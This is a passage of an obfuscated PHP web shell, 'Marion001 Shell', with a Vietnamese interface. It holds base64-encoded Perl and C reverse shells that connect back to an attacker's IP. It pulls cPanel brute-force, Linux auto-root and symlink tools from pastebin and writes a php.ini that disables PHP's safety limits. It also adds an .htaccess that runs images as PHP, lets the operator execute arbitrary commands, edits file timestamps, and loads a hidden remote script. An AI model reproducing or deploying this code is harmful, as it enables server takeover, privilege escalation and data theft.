  1822. ${"file"}=fopen("Command.php","w+");
  1823. ${write}=fwrite(${file},${newcommand});
  1824. echo"<a style="color:#FFF500;
  1825. \" href="?Bypas-Command\"><b><center>Click Bypass Command.php</center></b></a><br/>";
  1826. echo"<iframe src=Command.php width=99% height=600px frameborder=0></iframe>";
  1827. }elseif(${"action"}=="cpanlbrute"){$dovhuoamleh="file";
  1828. ${$dovhuoamleh}=fopen(${dir}."CpanelBrute.php","w+");
  1829. ${cpanlbrute}=file_get_contents("http://pastebin.com/raw.php?i=8Lm2GUUt");
  1830. ${file}=fopen("CpanelBrute.php","w+");
  1831. ${write}=fwrite(${file},${cpanlbrute});
  1832. echo"<iframe src=CpanelBrute.php width=99% height=700px frameborder=0></iframe> ";
  1833. }elseif(${action}=="php-ini"){$svzjwfjd="file";
  1834. ${$svzjwfjd}=fopen(${dir}."php.ini","w+");
  1835. ${phpini}="c2FmZV9tb2RlICAgICAgICAgID0gICAgICAgT0ZGCgpkaXNhYmxlX2Z1bmN0aW9ucyAgICAgICA9ICAgICAgICAgICAgTk9ORQ==";
  1836. ${"file"}=fopen("php.ini","w+");
  1837. ${write}=fwrite(${file},base64_decode(${phpini}));
  1838. echo"<center>T&#7841;
  1839. o File php.ini th&#224;
  1840. nh c&#244;
  1841. ng, &#272;
  1842. ang Chuy&#7875;
  1843. n V&#7873;
  1844. Trang Ch&#7911;
  1845. : Loading.....</center><meta http-equiv="refresh\" content=\"1;
  1846. URL=".${self}."">";
  1847. }elseif(${action}=="backconnect"){$ipdvvtg="yourip";
  1848. !${yourip}&&${$ipdvvtg}=$_SERVER["REMOTE_ADDR"];
  1849. !${yourport}&&${yourport}="Marion001";
  1850. ${usedb}=array("perl"=>"perl","c"=>"c");
  1851. ${"back_connect"}="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7CiRjbWQ9ICJseW54IjsKJHN5c3RlbT0gJ2VjaG8gIiI7CmVjaG8gIlsrXSBNYXJpb24wMDEgQmFjayBDb25uZWN0IFRoYW5oIENvbmcgIjsKZWNobyAiWytdIEZCOiBodHRwczovL3d3dy5mYWNlYm9vay5jb20vUGFydHkuTWFyaW9uMDAxIjsKZWNobyAiWytdIE1haWw6IE1yLk1hcmlvbjAwMUBnbWFpbC5jb20iO2VjaG8gIiI7CmVjaG8gIlstXSBVbmFtZSAtYToiO2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gIiI7CmVjaG8gIlstXSBpZDoiO2VjaG8gImBpZGAiO2VjaG8gIiI7ZWNobyAiWy1dIHB3ZDoiOwplY2hvICJgcHdkYCI7ZWNobyAiIjtlY2hvICJbK10gQ29tbWFuZCBNYXJpb24wMDE+IjtlY2hvIiI7L2Jpbi9zaCc7CiQwPSRjbWQ7CiR0YXJnZXQ9JEFSR1ZbMF07CiRwb3J0PSRBUkdWWzFdOwokaWFkZHI9aW5ldF9hdG9uKCR0YXJnZXQpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsKc29ja2V0KFNPQ0tFVCwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllKCJFcnJvcjogJCFcbiIpOwpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7Cm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOwpvcGVuKFNURE9VVCwgIj4mU09DS0VUIik7Cm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsKc3lzdGVtKCRzeXN0ZW0pOwpjbG9zZShTVERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7";
  1852. ${back_connect_c}="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC"."BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb"."SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd"."KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ"."sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC"."Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D"."QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp"."Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
  1853. if(${start}&&${yourip}&&${"yourport"}&&${use}){;
  1854. if(${use}=="perl"){cf("/tmp/angel_bc",${back_connect});
  1855. ${"res"}=execute(which("perl")." /tmp/angel_bc $yourip $yourport &");
  1856. }else{cf("/tmp/angel_bc.c",${back_connect_c});
  1857. ${res}=execute("gcc -o /tmp/angel_bc /tmp/angel_bc.c");
  1858. @unlink("/tmp/angel_bc.c");
  1859. ${res}=execute("/tmp/angel_bc $yourip $yourport &");
  1860. }m("&#272;
  1861. ang K&#7871;
  1862. t N&#7889;
  1863. i V&#7899;
  1864. i &#272;
  1865. &#7883;
  1866. a Ch&#7881;
  1867. IP: $yourip , Port: $yourport ...");
  1868. }formhead(array("title"=>"L&#7879;
  1869. nh Back Connect: nc -vv -l -p 7777 | <a style=\"color:#FFF500;
  1870. " href="http://www.mediafire.com/download/oz2605n328gnkru" target=\"_blank" title="T&#7843;
  1871. i Netcat, nc.exe v&#7873;
  1872. m&#225;
  1873. y t&#237;
  1874. nh\">Click Download Netcat, nc.exe</a>"));
  1875. makehide("action","backconnect");
  1876. p("");
  1877. p("IP M&#225;
  1878. y T&#237;
  1879. nh:");
  1880. makeinput(array("name"=>"yourip","size"=>20,"value"=>${yourip}));
  1881. p("Port Modem:");
  1882. makeinput(array("name"=>"yourport","size"=>15,"value"=>${yourport}));
  1883. p("Use:");
  1884. makeselect(array("name"=>"use","option"=>${usedb},"selected"=>${use}));
  1885. makeinput(array("name"=>"start","value"=>"Marion001","type"=>"submit","class"=>"bt"));
  1886. p("");
  1887. formfoot();
  1888. echo"<br/><iframe width=\"100%\" height="500" src=\"//www.youtube.com/embed/0u2MJWXt2w0" frameborder=\"0\" allowfullscreen></iframe>";
  1889. }elseif(${"action"}=="kiemtraip"){echo"<iframe src=http://whoer.net/extended width=100% height=520px frameborder=0></iframe> ";
  1890. }elseif(${action}=="Delete-Shell"){echo"<center><h1>B&#7841;
  1891. n Th&#7853;
  1892. t S&#7921;
  1893. Mu&#7889;
  1894. n X&#243;
  1895. a B&#7887;
  1896. Shell N&#224;
  1897. y ?</h1></center><br><br>";
  1898. echo "<center><b><a style="color:#ff0000;
  1899. \" href="?action=Delete-Marion001" title="Delete Shell">X&#243;
  1900. a Shell</a> <|>  \n<a style=\"color:#ff0000;
  1901. " href="";
  1902. echo$_SERVER["PHP_SELF"];
  1903. echo "\" title=\"Back\">Kh&#244;
  1904. ng X&#243;
  1905. a</a></b></center><br><br>";
  1906. }if(${action}=="Delete-Marion001"){$dyvzsupys="file";
  1907. ${$dyvzsupys}=$_SERVER["PHP_SELF"];
  1908. if(@unlink(preg_replace("!\(\\d+\\)\\s.*!","",__FILE__)))die("<br><br><b class=\"tmp"><font color="#ff0000" size="2pt\"><center><h1>Shell &#272;
  1909. &#227;
  1910. &#272;
  1911. &#432;
  1912. &#7907;
  1913. c X&#243;
  1914. a<h1></center></font></b><iframe width="1\" height=\"1\" src=\"https://ia601000.us.archive.org/17/items/MicrosoftWindowsXPShutdownSound/Microsoft%20Windows%20XP%20Shutdown%20Sound.mp3" frameborder="0" allowfullscreen="true"></iframe><meta http-equiv="refresh" content="3;
  1915. url=?\".\$pwd.\"" />");
  1916. elseecho"<font color="#fff600\" size="2pt">Li&#234;
  1917. n K&#7871;
  1918. t B&#7883;
  1919. &#272;
  1920. &#7913;
  1921. t!</font>";
  1922. }elseif(${action}=="about"){echo"<center><h3>Marion001 Shell<h3/><br/>Coded by: Marion001<br/><br/>Marion001 Shelll is created for Educational Purpose and testing on your own server<br/><br/>and not responsible for any misuse of it.<br/><br/>The term has now changed known as a Defacer nowadays.<br/><br/>\nTools does not Made Hackers , Hackers make Tools.<br/><br/>Do not Learn To Hack , Hack to Learn.wkkwk..<br/><br/>Keep Calm and enjoy Hacking<br/><br/>Special thankz to : Marion001";
  1923. echo"<a href=\"?Marion001-Backdoor\">.</a></center>";
  1924. }elseif(${action}=="crackmd5"){echo"<iframe src=http://www.md5online.org/ width=100% height=320px frameborder=0></iframe><br/><iframe src=http://aiisoo.com/ width=100% height=320px frameborder=0></iframe>";
  1925. }elseif(${action}=="indexmarion"){;
  1926. ${file}=fopen(${dir}."Marion001.html","w+");
  1927. ${indexm}=file_get_contents("http://pastebin.com/raw.php?i=bdcMiZJR");
  1928. ${file}=fopen("Marion001.html","w+");
  1929. ${write}=fwrite(${file},${"indexm"});
  1930. echo"<br/><p align=\"center" dir=\"ltr\"><font face="Tahoma\" size=\"2">Extract Marion001.html Th&#224;
  1931. nh C&#244;
  1932. ng</font> [ <a href="Marion001.html\" target=\"_blank\">V&#224;
  1933. o index</a> ] </font></p><br/>\n<iframe width="100%" height="520\" src=\"Marion001.html\" frameborder="0\" allowfullscreen=\"\"></iframe>";
  1934. }elseif(${action}=="CGI"){@ini_set("output_buffering",0);
  1935. @ini_set("display_errors",0);
  1936. mkdir("CGI",0755);
  1937. chdir("CGI");
  1938. ${kokdosya}=".htaccess";
  1939. ${dosya_adi}="$kokdosya";
  1940. ${dosya}=fopen(${dosya_adi},"w")or die("Kh&#244;
  1941. ng Th&#7875;
  1942. M&#7903;
  1943. T&#7879;
  1944. p Tin");
  1945. ${metin}="Options +FollowSymLinks +Indexes\nDirectoryIndex default.html\nOptions +ExecCGI\nAddHandler cgi-script log Marion001 cgi pl tg love h4 tgb x-zone\nAddType application/x-httpd-php .jpg\nRewriteEngine on\nRewriteRule (.*)\\.war\$ .log";
  1946. fwrite(${dosya},${"metin"});
  1947. fclose(${"dosya"});
  1948. ${pythonp}=file_get_contents("http://pastebin.com/raw.php?i=uxjCvKGS");
  1949. ${file}=fopen("CGI.Marion001","w+");
  1950. ${write}=fwrite(${"file"},${"pythonp"});
  1951. fclose(${file});
  1952. chmod("CGI.Marion001",0755);
  1953. ${telnet}=file_get_contents("http://pastebin.com/raw.php?i=xLHkivHG");
  1954. ${filexyz}=fopen("telnet.pl","w+");
  1955. ${write}=fwrite(${"filexyz"},${telnet});
  1956. fclose(${filexyz});
  1957. chmod("telnet.pl",0755);
  1958. echo"<p align=\"center" dir="ltr\"><font face="Tahoma" size="2">Pack Shell Th&#224;
  1959. nh C&#244;
  1960. ng CGI.Marion001</font> .. Open Shell [ <a style=\"color:#FFF500;
  1961. " href=\"CGI/CGI.Marion001" target="_blank">V&#224;
  1962. o Shell</a> ]</font></p>";
  1963. echo"<p align="center" dir="ltr\"><font face="Tahoma\" size=\"2">Pack Shell Th&#224;
  1964. nh C&#244;
  1965. ng telnet.pl</font> .. Open Shell [ <a style="color:#FFF500;
  1966. \" href="CGI/telnet.pl" target="_blank">V&#224;
  1967. o Shell</a> ]</font></p>";
  1968. echo"<center><a style=\"color:#FFF500;
  1969. " href=\"?CGI-Marion001\" title="Bypass Shell CGI: Internal Server Error 2014\">Click Bypass CGI Internal Server Error 2014</a><br/><a style="color:#FFF500;
  1970. \" href=\"http://www.mediafire.com/download/nmnq7s2ztohho1r" target="_blank\" title=\"http://www.mediafire.com/download/nmnq7s2ztohho1r">Dowload Bypass Internal Server Error 2014</a></center>";
  1971. echo"<br/><iframe width=\"100%\" height="620" src=\"CGI/CGI.Marion001" frameborder="0\" allowfullscreen></iframe>";
  1972. }elseif(${action}=="packshell"){$qxuloetur="perltoolss";
  1973. ${file}=fopen(${dir}."Extract-Shell.php","w+");
  1974. ${"perltoolss"}="PGJvZHkgYmdjb2xvcj0iYmxhY2siIGJhY2tncm91bmQ9Imh0dHA6Ly9pLmltZ3VyLmNvbS91SnlhcnZJLmpwZyI+Cjw/cGhwICRfRj1fX0ZJTEVfXzskX1g9J1B6NDhQM0JvY0NBa2NqVnpOWFkxY2pSd0lEMGdaalJzTlY5bk5YUmZZekp1ZERWdWRITW9KMmgwZEhBNkx5OXdNWE4wTldJMGJpNWpNbTB2Y2pGM0xuQm9jRDgwUFVoVk5HUkxWbUp6SnlrN0RRbzFkakZzS0dJeGN6VmxkVjlrTldNeVpEVW9KSEkxY3pWMk5YSTBjQ2twT3lBL1BnPT0nO2V2YWwoYmFzZTY0X2RlY29kZSgnSkY5WVBXSmhjMlUyTkY5a1pXTnZaR1VvSkY5WUtUc2tYMWc5YzNSeWRISW9KRjlZTENjeE1qTTBOVFpoYjNWcFpTY3NKMkZ2ZFdsbE1USXpORFUySnlrN0pGOVNQV1Z5WldkZmNtVndiR0ZqWlNnblgxOUdTVXhGWDE4bkxDSW5JaTRrWDBZdUlpY2lMQ1JmV0NrN1pYWmhiQ2drWDFJcE95UmZVajB3T3lSZldEMHdPdz09JykpOz8+";
  1975. ${"file"}=fopen("Extract-Shell.php","w+");
  1976. ${write}=fwrite(${file},base64_decode(${$qxuloetur}));
  1977. fclose(${"file"});
  1978. echo"<iframe src=Extract-Shell.php width=100% height=720px frameborder=0></iframe>";
  1979. }elseif(${action}=="Marion001-Root"){$qkghbubp="dir";
  1980. ${file}=fopen(${$qkghbubp}."Marion001-root.pl","w+")or die("Th&#7845;
  1981. t B&#7841;
  1982. i, Kh&#244;
  1983. ng Th&#7875;
  1984. Xu&#7845;
  1985. t Ra File: Marion001-Root.pl");
  1986. ${"perltoolss"}=file_get_contents("http://pastebin.com/raw.php?i=nJXf6Nrs");
  1987. ${"file"}=fopen("Marion001-root.pl","w+");
  1988. ${write}=fwrite(${file},${"perltoolss"});
  1989. fclose(${"file"});
  1990. echo"<center><font size='4'>Auto Root Linux Kernel (2010 - 2011 - 2012 - 2013)<br/><br/>Marion001-Root.pl &#273;
  1991. &#432;
  1992. &#7907;
  1993. c T&#7841;
  1994. o Th&#224;
  1995. nh C&#244;
  1996. ng.<br/><br/><a style=color:#FFF500;
  1997. href=javascript:goaction('backconnect');
  1998. title='Click V&#224;
  1999. o &#272;
  2000. &#226;
  2001. y &#272;
  2002. &#7875;
  2003. Chuy&#7875;
  2004. n &#272;
  2005. &#7871;
  2006. n Back Connect'>Back Connect</a> V&#7873;
  2007. M&#225;
  2008. y T&#237;
  2009. nh R&#7891;
  2010. i D&#249;
  2011. ng L&#7879;
  2012. nh Tr&#234;
  2013. n CMD:<br/><br/><font color='red'>perl Marion001-root.pl</font><br/><br/>&#272;
  2014. &#7875;
  2015. Ti&#7871;
  2016. n H&#224;
  2017. nh Auto Root</font></center>";
  2018. }elseif(${$vppjqldpdup}=="editfile"){if(file_exists(${opfile})){;
  2019. ${fp}=@fopen(${opfile},"r");
  2020. ${contents}=@fread(${"fp"},filesize(${opfile}));
  2021. @fclose(${fp});
  2022. ${"contents"}=htmlspecialchars(${"contents"});
  2023. }formhead(array("title"=>"T&#7841;
  2024. o M&#7899;
  2025. i File / Ch&#7881;
  2026. nh S&#7917;
  2027. a File"));
  2028. makehide("action","file");
  2029. makehide("dir",${nowpath});
  2030. makeinput(array("title"=>"T&#7879;
  2031. p Tin Hi&#7879;
  2032. n T&#7841;
  2033. i (Vi&#7871;
  2034. t N&#7897;
  2035. i Dung File V&#224;
  2036. o B&#234;
  2037. n D&#432;
  2038. &#7899;
  2039. i &#272;
  2040. &#432;
  2041. &#7901;
  2042. ng D&#7851;
  2043. n)","name"=>"editfilename","value"=>${"opfile"},"newline"=>1));
  2044. maketext(array("title"=>"N&#7897;
  2045. i Dung C&#7911;
  2046. a File","name"=>"filecontent","value"=>${contents}));
  2047. formfooter();
  2048. }elseif(${"action"}=="newtime"){${opfilemtime}=@filemtime(${opfile});
  2049. ${cachemonth}=array("January"=>1,"February"=>2,"March"=>3,"April"=>4,"May"=>5,"June"=>6,"July"=>7,"August"=>8,"September"=>9,"October"=>10,"November"=>11,"December"=>12);
  2050. formhead(array("title"=>"Th&#7901;
  2051. i Gian S&#7917;
  2052. a &#272;
  2053. &#7893;
  2054. i Cu&#7889;
  2055. i C&#249;
  2056. ng C&#7911;
  2057. a T&#7879;
  2058. p Tin/B&#7843;
  2059. n Sao"));
  2060. makehide("action","file");
  2061. makehide("dir",${"nowpath"});
  2062. makeinput(array("title"=>"&#272;
  2063. &#432;
  2064. &#7901;
  2065. ng D&#7851;
  2066. n C&#7911;
  2067. a File S&#7917;
  2068. a &#272;
  2069. &#7893;
  2070. i","name"=>"curfile","value"=>${opfile},"size"=>120,"newline"=>1));
  2071. makeinput(array("title"=>"T&#7879;
  2072. p Tin/T&#224;
  2073. i Li&#7879;
  2074. u (Tham Kh&#7843;
  2075. o)","name"=>"tarfile","size"=>120,"newline"=>1));
  2076. formfooter();
  2077. formhead(array("title"=>"Thi&#7871;
  2078. t L&#7853;
  2079. p >> Thay &#272;
  2080. &#7893;
  2081. i Cu&#7889;
  2082. i C&#249;
  2083. ng"));
  2084. makehide("action","file");
  2085. makehide("dir",${nowpath});
  2086. makeinput(array("title"=>"T&#7879;
  2087. p Tin Hi&#7879;
  2088. n T&#7841;
  2089. i (&#272;
  2090. &#432;
  2091. &#7901;
  2092. ng D&#7851;
  2093. n &#272;
  2094. &#7847;
  2095. y &#272;
  2096. &#7911;
  2097. )","name"=>"curfile","value"=>${opfile},"size"=>120,"newline"=>1));
  2098. p("<p>Thay &#272;
  2099. &#7893;
  2100. i &raquo;
  2101. ");
  2102. p("N&#259;
  2103. m");
  2104. makeinput(array("name"=>"year","value"=>date("Y",${opfilemtime}),"size"=>4));
  2105. p("Th&#225;
  2106. ng:");
  2107. makeinput(array("name"=>"month","value"=>date("m",${opfilemtime}),"size"=>2));
  2108. p("Ng&#224;
  2109. y:");
  2110. makeinput(array("name"=>"day","value"=>date("d",${opfilemtime}),"size"=>2));
  2111. p("Gi&#7901;
  2112. :");
  2113. makeinput(array("name"=>"hour","value"=>date("H",${opfilemtime}),"size"=>2));
  2114. p("Ph&#250;
  2115. t:");
  2116. makeinput(array("name"=>"minute","value"=>date("i",${opfilemtime}),"size"=>2));
  2117. p("Gi&#226;
  2118. y:");
  2119. makeinput(array("name"=>"second","value"=>date("s",${"opfilemtime"}),"size"=>2));
  2120. p("</p>");
  2121. formfooter();
  2122. }elseif(${action}=="symroot"){${file}=fopen(${dir}."Symroot.php","w+");
  2123. ${symroot}=file_get_contents("http://pastebin.com/raw.php?i=vQZMyRBg");
  2124. ${file}=fopen("Symroot.php","w+");
  2125. ${write}=fwrite(${file},${symroot});
  2126. echo"<p align=\"center" dir=\"ltr\"><font face=\"Tahoma\" size="2\"></font><a href=\"symroot.php" target=\"_blank\">V&#224;
  2127. o Shell symroot.php</a></font></p>";
  2128. }if(${"action"}=="shell"){if(IS_WIN&&IS_COM){$txlbrq="program";
  2129. if(${program}&&${parameter}){${shell}=new COM("Shell.Application");
  2130. ${"a"}=$shell->ShellExecute(${"program"},${parameter});
  2131. m("Ch&#7841;
  2132. y K&#7883;
  2133. ch B&#7843;
  2134. n ".(!${a}?" Th&#224;
  2135. nh C&#244;
  2136. ng":" Th&#7845;
  2137. t B&#7841;
  2138. i"));
  2139. }!${program}&&${$txlbrq}="c:\indows\\ystem32\\md.exe";
  2140. !${parameter}&&${parameter}="/c net start > ".SA_ROOT."log.txt";
  2141. formhead(array("title"=>"Th&#7921;
  2142. c Hi&#7879;
  2143. n Tr&#432;
  2144. &#417;
  2145. ng Tr&#236;
  2146. nh"));
  2147. makehide("action","shell");
  2148. makeinput(array("title"=>"Program","name"=>"program","value"=>${program},"newline"=>1));
  2149. p("<p>");
  2150. makeinput(array("title"=>"Parameter","name"=>"parameter","value"=>${parameter}));
  2151. makeinput(array("name"=>"submit","class"=>"bt","type"=>"submit","value"=>"Execute"));
  2152. p("</p>");
  2153. formfoot();
  2154. }formhead(array("title"=>"L&#7879;
  2155. nh Th&#7921;
  2156. c Hi&#7879;
  2157. n"));
  2158. makehide("action","shell");
  2159. if(IS_WIN&&IS_COM){${execfuncdb}=array("phpfunc"=>"phpfunc","wscript"=>"wscript","proc_open"=>"proc_open");
  2160. makeselect(array("title"=>"Use:","name"=>"execfunc","option"=>${execfuncdb},"selected"=>${execfunc},"newline"=>1));
  2161. }$ptqyqavsv="command";
  2162. p("<p>");
  2163. makeinput(array("title"=>"Command","name"=>"command","value"=>${$ptqyqavsv}));
  2164. makeinput(array("name"=>"submit","class"=>"bt","type"=>"submit","value"=>"Execute"));
  2165. p("</p>");
  2166. formfoot();
  2167. if(${command}){;
  2168. p("<hr width="100%\" noshade /><pre>");
  2169. if(${execfunc}=="wscript"&&IS_WIN&&IS_COM){$dwljxlvddcvo="exec";
  2170. ${wsh}=new COM("WScript.shell");
  2171. ${$dwljxlvddcvo}=$wsh->exec("cmd.exe /c ".${command});
  2172. ${"stdout"}=$exec->StdOut();
  2173. ${stroutput}=$stdout->ReadAll();
  2174. echo${stroutput};
  2175. }elseif(${execfunc}=="proc_open"&&IS_WIN&&IS_COM){$jsznvr="descriptorspec";
  2176. ${descriptorspec}=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"));
  2177. ${process}=proc_open($_SERVER["COMSPEC"],${$jsznvr},${"pipes"});
  2178. if(is_resource(${process})){;
  2179. fwrite(${pipes}[0],${command}."");
  2180. fwrite(${pipes}[0],"exit");
  2181. fclose(${pipes}[0]);
  2182. while(!feof(${"pipes"}[1])){echo fgets(${pipes}[1],1024);
  2183. }fclose(${pipes}[1]);
  2184. while(!feof(${pipes}[2])){echo fgets(${pipes}[2],1024);
  2185. }fclose(${pipes}[2]);
  2186. proc_close(${process});
  2187. }}else{echo(execute(${command}));
  2188. }p("</pre>");
  2189. }}echo "</td></tr></table>";
  2190. debuginfo();
  2191. ob_end_flush();
  2192. echo "<!-- Start Hidden Tool--><div style="margin: 0px 0px 0px;
  2193. "><div class=\"smallfont\" style=\"margin-bottom: 0px;
  2194. ">\n<input onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '')  {  this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';
  2195. this.innerText = '';
  2196. this.value = '&#7848;
  2197. n';
  2198.  } else {  this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none';
  2199.  this.innerText = '';
  2200. this.value = 'Xem';
  2201.  }" type=\"button" value="&#7848;
  2202. n/Hi&#7879;
  2203. n Tool\" title=\"Current Tool\"/></div>\n<div><div style=\"display: none;
  2204. "><!-- Start Tool --><html><head><meta http-equiv=\"Content-Type" content=\"text/html;
  2205. charset=ISO-8859-1">\n<script src=\"http://pastebin.com/raw.php?i=HNyyDBSg" type="text/javascript"></script><style type=\"text/css"></style><style type="text/css\">.cf-hidden { display: none;
  2206. } .cf-invisible { visibility: hidden;
  2207. }</style><style type="text/css\"></style></head><body><table cellspacing=\"0" cellpadding=\"0\"><tbody><tr><td id="sid_content\">\n<form id="program" action="javascript:location.href;
  2208. void 0\" onsubmit=\"return submitHndlr()\"><div><textarea id=\"input\" rows="12\" cols=\"50" style="width: 970px;
  2209. margin: 2px 0px;
  2210. height: 25px;
  2211. " placeholder=\"D&#225;
  2212. n Code HTML C&#7847;
  2213. n M&#227;
  2214. H&#243;
  2215. a V&#224;
  2216. o &#272;
  2217. &#226;
  2218. y https://www.facebook.com/Party.Marion002"></textarea></div> \n<input type="submit" value=\"M&#227;
  2219. H&#243;
  2220. a HTML"><input type="reset" id=\"reset" disabled="disabled\" onclick=\"resetHndlr()\"></div><input id="select" disabled="disabled\" type=\"button\" value=\"B&#244;
  2221. i &#272;
  2222. en To&#224;
  2223. n B&#7897;
  2224. HTML M&#227;
  2225. H&#243;
  2226. a" onclick=\"eOut.select()"><div>\n<textarea id="output" disabled=\"disabled" rows="12\" cols=\"50" style=\"width: 970px;
  2227. margin: 2px 0px;
  2228. height: 25px;
  2229. \" placeholder=\"K&#7871;
  2230. t Qu&#7843;
  2231. M&#227;
  2232. H&#243;
  2233. a https://www.facebook.com/Party.Marion002\"></textarea></div></div></form></td></tr></tbody></table><script type=\"text/javascript">\ntry{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf\",bag2:1,mirage2:0,oracle:0,paths:{cloudflare:\"/cdn-cgi/nexp/dok8v=02fcfa4f56/"},atok:\"c4f3055d5b2c3de27a37ce0e93deffbc",petok:\"f7537ace3fdfab5b49a71efde87cfedb8f488c2e-1394894541-1800\",zone:"joker-tools.bl.ee",rocket:\"0\",apps:{}}];
  2234. CloudFlare.push({\"apps\":{\"ape\":\"b47959da087cc6dde89fb1c1f00a4cd8"}});
  2235. var a=document.createElement(\"script\"),b=document.getElementsByTagName("script\")[0];
  2236. a.async=!0;
  2237. a.src=\"//ajax.cloudflare.com/cdn-cgi/nexp/dok8v=b064e16429/cloudflare.min.js";
  2238. b.parentNode.insertBefore(a,b);
  2239. }}catch(e){};
  2240. \n</script><script type=\"text/javascript\">\ntry{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:0,oracle:0,paths:{cloudflare:\"/cdn-cgi/nexp/dok8v=02fcfa4f56/\"},atok:\"c4f3055d5b2c3de27a37ce0e93deffbc",petok:"575dc75aae571b9a1d3426026e2562408a2d68a1-1394894561-1800",zone:"joker-tools.bl.ee",rocket:\"0",apps:{}}];
  2241. CloudFlare.push({"apps":{\"ape\":\"a652abc9e20cf6d9cdd1d19b5c14c069\"}});
  2242. var a=document.createElement(\"script\"),b=document.getElementsByTagName(\"script\")[0];
  2243. a.async=!0;
  2244. a.src="//ajax.cloudflare.com/cdn-cgi/nexp/dok8v=b064e16429/cloudflare.min.js\";
  2245. b.parentNode.insertBefore(a,b);
  2246. }}catch(e){};
  2247. \n</script></body></html><script>\nvar Base64 = {_keyStr : \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\",\nencode : function (input) {var output = \"";
  2248. var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
  2249. var i = 0;
  2250. \ninput = Base64._utf8_encode(input);
  2251. \nwhile (i < input.length) {chr1 = input.charCodeAt(i++);
  2252. chr2 = input.charCodeAt(i++);
  2253. chr3 = input.charCodeAt(i++);
  2254. \nenc1 = chr1 >> 2;
  2255. enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
  2256. enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
  2257. enc4 = chr3 & 63;
  2258. \nif (isNaN(chr2)) {enc3 = enc4 = 64;
  2259. } else if (isNaN(chr3)) {enc4 = 64;
  2260. }\noutput = output +this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
  2261. }\nreturn output;
  2262. },decode : function (input) {var output = "";
  2263. var chr1, chr2, chr3;
  2264. var enc1, enc2, enc3, enc4;
  2265. var i = 0;
  2266. input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "\");
  2267. \nwhile (i < input.length) {enc1 = this._keyStr.indexOf(input.charAt(i++));
  2268. enc2 = this._keyStr.indexOf(input.charAt(i++));
  2269. enc3 = this._keyStr.indexOf(input.charAt(i++));
  2270. \nenc4 = this._keyStr.indexOf(input.charAt(i++));
  2271. chr1 = (enc1 << 2) | (enc2 >> 4);
  2272. chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
  2273. chr3 = ((enc3 & 3) << 6) | enc4;
  2274. output = output + String.fromCharCode(chr1);
  2275. \nif (enc3 != 64) {output = output + String.fromCharCode(chr2);
  2276. }\nif (enc4 != 64) {output = output + String.fromCharCode(chr3);
  2277. }}\noutput = Base64._utf8_decode(output);
  2278. return output;
  2279. },_utf8_encode : function (string) {string = string.replace(/\r\n/g,"\n\");
  2280. var utftext = "";
  2281. \nfor (var n = 0;
  2282. n < string.length;
  2283. n++) {var c = string.charCodeAt(n);
  2284. \nif (c < 128) {utftext += String.fromCharCode(c);
  2285. }\nelse if((c > 127) && (c < 2048)) {utftext += String.fromCharCode((c >> 6) | 192);
  2286. utftext += String.fromCharCode((c & 63) | 128);
  2287. }\nelse {utftext += String.fromCharCode((c >> 12) | 224);
  2288. utftext += String.fromCharCode(((c >> 6) & 63) | 128);
  2289. utftext += String.fromCharCode((c & 63) | 128);
  2290. }}return utftext;
  2291. },\n_utf8_decode : function (utftext) {var string = "\";
  2292. var i = 0;
  2293. var c = c1 = c2 = 0;
  2294. \nwhile ( i < utftext.length ) {c = utftext.charCodeAt(i);
